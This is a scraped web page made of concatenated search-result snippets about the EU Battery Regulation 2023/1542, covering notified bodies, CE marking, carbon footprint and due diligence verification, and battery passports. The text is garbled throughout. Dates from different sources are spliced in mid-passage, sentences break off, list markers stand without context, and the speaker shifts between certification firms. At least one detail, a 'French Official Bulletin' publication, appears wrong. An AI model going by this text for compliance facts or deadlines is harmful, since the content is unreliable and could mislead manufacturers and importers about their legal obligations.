TÜV Rheinland. Notified bodies take responsibilities in areas of public interest and, therefore, must remain accountable to the competent national authorities. Oct 12, 2023 · This verification process must be carried out by a notified body (organizations specifically designated by their EU country to carry out conformity assessments). Search by country; Search by legislation; Free search; The lists of notified bodies are given for information only and are valid at the date indicated. Jan 24, 2024 · Only notified bodies under EU law can issue certificates of compliance for harmonised products and only in the area for which they are notified. • Product carbon footprint verification. Battery Products Covered by the Regulation . It should be presented along with the CE marking if a notified body is used. The Battery Regulation comprises 13 chapters and 14 annexes (see Fig. Under the new regulation, every industrial battery with a capacity of more than 2kWh, EV battery, and LMT battery will require a battery passport. This regulation not only sets stringent standards for battery production and disposal but also mandates carbon footprint calculations, recycled Article 14 of the Battery Regulation lists requirements for battery parameters that are used to determine the battery's state of health and expected lifetime. Due diligence requirements. “ Manufacturers must calculate the carbon footprint for every battery type per manufacturing plant. They are called ‘notified bodies’ under EU legislation. Nor is a battery energy storage system the same as a battery. This article explains what the new EU battery regulation means for those operating with batteries. So, we would like to offer this conformity assessment service and will apply to becoming a Notified Body. The EU could account for 17 % of that demand. Whether electric vehicle (EV) batteries, batteries in light means of transport (LMT), industrial batteries with internal and external storage, stationary battery energy storage systems, starter batteries, portable batteries or general purpose portable batteries - each This new battery regulation has implications for all stakeholders: Manufacturers, importers, distributors, retailers, disposers, recyclers, service providers, online platforms and consumers. Since the commission has not yet announced these notified bodies, enforcement will commence 12 months after the publication of the updated list of notified bodies. A notified body is an organisation designated by an EU country to assess the conformity of certain products before being placed on the market. 2023-1542 of 12 July 2023 concerning all batteries(1) and waste batteries was published in the French Official Bulletin L 191 of 28 July 2023. Jul 1, 2024 · Module A is a self-assessment module that allows manufacturers to confirm and declare their compliance with regulation requirements. In the future, the European Commission will determine carbon footprint performance classes and maximum carbon footprint thresholds. Certificates from UK based former Notified Bodies ceased to be valid on 1st January 2021 and any manufacturer relying on a certificate from a UK based Notified Body for their CE marking now needs to get their product re-certified. • Battery labelling and logo compliance assessment. In our webinar “Navigating the EU Battery Regulation 2023/1542 for Automotive Applications” we provide stakeholders of the automotive industry with valuable Aug 22, 2023 · c. Oct 20, 2023 · As a result, the notified body will issue a verification report that will record the activities undertaken by economic operators and their outcomes. For requirements related to the carbon footprint, the levels of recycled content and the responsible sourcing of raw materials (due diligence), the proposal foresees mandatory third party verification via notified bodies. ). In addition, it will be required to report annually on the battery due diligence policies in a report publicly available on the internet. EU Battery Regulations and Notified Bodies Depending on the type of battery, companies working toward achieving compliance with the new CE marking requirements may need to work with a notified body. Jul 28, 2023 · regulation (eu) 2023/1542 of the european parliament and of the council of 12 July 2023 concerning batteries and waste batteries, amending Directive 2008/98/EC and Regulation (EU) Oct 18, 2023 · Notified bodies may be involved in granting the CE marking for certain types of batteries. 1). The new battery regulation introduces key changes to the existing Battery Directive, including: What is the EU Battery Regulation 2023/1542? Amended battery categories: portable, industrial, automotive, electric vehicle (EV), LMT Hazardous substances Carbon footprint Performance and durability Design for removability and replaceability Notified bodies need to be involved in granting the CE marking for certain types of batteries. These parameters are used e. • starter, lighting or ignition (SLI) battery • light means of transport (LMT) battery • electric vehicle (EV) battery • industrial battery, incl. This includes disclosure of information to authorities and immediate downstream purchasers. 1: Only the chapters of the EU Battery Regulation marked with * are relevant for medical device manufacturers (click to enlarge) The requirements for medical device manufacturers are: Carbon footprint statement Sep 26, 2023 · In July 2023, the European Union gave the green light to a groundbreaking EU battery regulation, officially named Regulation 2023/1542. Fig. Vinçotte provides essential compliance support, including analysis, training, and verification. DNV is in process to become a notified body for the New battery regulation. Aug 17, 2023 · The regulation requires a third-party verification (performed by a notified body) of the due diligence policies and how they are implemented in the management system. Batteries' manufacturing , use and end-of-life handling, however, raise a number of environmental and social challenges. It mandates third-party verification, carried out by a notified body, to assess and verify the effectiveness of due diligence policies and their integration into the company's management system. Providing information on the battery: marking & labelling, battery passport, battery management system. global battery demand is expected to increase 14 fold by 2030. Battery Passport: From February 18, 2027, LMT, EV, and industrial batteries with a capacity greater than 2 kWh must be electronically registered with a battery passport carrying an identification QR code and CE marking. The most significant changes in the new EU battery regulation Sep 26, 2023 · 3. Jan 23, 2024 · The European Union's new Battery Regulation 2023/1542, which takes effect in February 2024, is introducing a significant shift for battery manufacturers, battery importers and their supply chains. The approval processes of the notified bodies are currently still ongoing. Mar 14, 2023 · Carbon Footprint: The Battery’s Environmental Impact. d. a notified body's involvement will be necessary when the Jun 24, 2024 · Notified body identification number: This number indicates that a notified body was involved in the assessment of the battery’s conformity with the regulation. The Battery Regulation applies to all categories of batteries, regardless of cell chemistry. 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